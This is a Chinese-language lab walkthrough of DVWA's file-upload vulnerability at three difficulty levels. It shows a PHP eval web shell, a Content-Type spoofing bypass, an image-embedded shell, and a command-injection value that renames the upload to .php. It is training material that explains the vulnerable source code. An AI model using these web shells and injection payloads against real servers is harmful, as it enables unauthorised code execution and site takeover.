DVWA文件上传漏洞审计

DVWA文件上传漏洞审计

●初级 🎈

首先尝试上传一个PHP文件，看是否会上传成功且被执行

<?php
phpinfo();
?>

浏览器访问一下：

成功执行，也就可以上传一句话木马了

<?php
@eval($_REQUEST[555]);
?>

使用蚁剑链接

代码审计一下：

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>

basename()函数：返回带有文件扩展名的文件名部分。例如：/xx/test.php，返回test.php
$target_path这个变量就是获取上传文件路径，move_uploaded_file函数移动文件上传位置，文件上传的时候会存到放临时目录，当脚本运行结束后就会销毁，所以要更改存放目录，可以看到，这个等级的上传完全没有限制，所以随便上传一个php木马就可以连接。

●中级 🎈🎈

首先尝试上传一个PHP文件，看是否会上传成功且被执行

<?php
phpinfo();
?>

发现不能直接上传php文件，只能上传JPEG和PNG文件，有文件限制。
使用BP抓包，可以通过修改Content-Type的值，依旧可以上传PHP文件

于是将就内容改为一句话木马

成功上传！！！

代码审计：

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>

分析源码，可以看到代码里对上传的类型和大小做了限制,只允许上传格式为jpeg和png格式,上传大小为小于100000字节。但是可以通过修改Content-Type的值，依旧可以上传PHP文件

●高级 🎈🎈🎈

使用中级的方法是不成功的。
查看源码：

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>

查看源码，High级别的代码读取文件名中最后一个”.”后的字符串，期望通过文件名来限制文件类型，因此要求上传文件名形式必须是”.jpeg” 、”.png”之一。同时，getimagesize函数更是限制了上传文件的文件头必须为图像类型。发现仅仅后缀是图片格式的还不行，文件内容必须还得是图片格式的。
（采用命令注入的LOW+文件上传的high）
首先设置一个图片马，使用Notepad++打开.png文件，在其最后一行加入一句话木马

<?php @eval($_REQUEST[555]);?>

点击上传，成功上传。

使用rename将上传的shell.png图片马后缀改为.php
127.0.0.1|rename C:\phpStudy\WWW\DVWA-2.0.1\hackable\uploads\shell.png shell.php

在使用蚁剑进行连接：